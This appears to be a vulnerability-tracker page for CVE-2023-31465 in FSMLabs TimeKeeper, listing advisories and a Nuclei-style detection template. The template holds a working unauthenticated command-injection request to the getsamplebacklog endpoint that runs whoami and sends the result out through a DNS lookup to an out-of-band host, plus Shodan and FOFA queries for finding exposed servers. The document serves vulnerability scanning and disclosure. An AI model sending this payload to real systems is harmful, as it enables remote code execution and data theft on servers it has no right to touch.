| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-31465 | 26 Jul 2023 20:15 | – | attackerkb |
| The vulnerability of the FSMLabs TimeKeeper software synchronization mechanism, related to insufficient validation of input data, allows a hacker to execute arbitrary code. | 22 Nov 2023 00:00 | – | bdu_fstec |
| CVE-2023-31465 | 22 Oct 2023 22:26 | – | circl |
| FSMLabs TimeKeeper security vulnerability | 26 Jul 2023 00:00 | – | cnnvd |
| CVE-2023-31465 | 26 Jul 2023 00:00 | – | cve |
| CVE-2023-31465 | 26 Jul 2023 00:00 | – | cvelist |
| CVE-2023-31465 | 26 Jul 2023 20:15 | – | nvd |
| CVE-2023-31465 | 26 Jul 2023 20:15 | – | osv |
| Integer overflow | 26 Jul 2023 20:15 | – | prion |
| PT-2023-6978 · Fsmlabs · Fsmlabs Timekeeper | 26 Jul 2023 00:00 | – | ptsecurity |

```yaml
id: CVE-2023-31465

info:
  name: TimeKeeper by FSMLabs - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
  impact: |
    Unauthenticated attackers can inject Bash commands through the arg[2] parameter in getsamplebacklog endpoint to execute arbitrary commands on the server, potentially compromising the entire TimeKeeper time synchronization infrastructure.
  remediation: |
    Update FSMLabs TimeKeeper to a version newer than 8.0.28 that properly sanitizes input parameters in getsamplebacklog and prevents command injection attacks.
  reference:
    - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-31465
    - https://fsmlabs.com/fsmlabs-cybersecurity/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-31465
    epss-score: 0.44455
    epss-percentile: 0.98611
    cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fsmlabs
    product: timekeeper
    shodan-query: http.favicon.hash:2134367771
    fofa-query: icon_hash=2134367771
  tags: cve,cve2023,timekeeper,rce,oast,fsmlabs,vkev,vuln

http:
  - raw:
      - |
        GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"seriesID":'
# digest: 4b0a00483046022100cb018a472285b446f7b2e6491e37154929d20139104274a0efe71db78bac3f2c022100f4c038ecd2e9a17c92b070146ad44295d64b90442cd7a6999c6eed7e13f2aec7:922c64590222798bb761d5b6d8e72950
```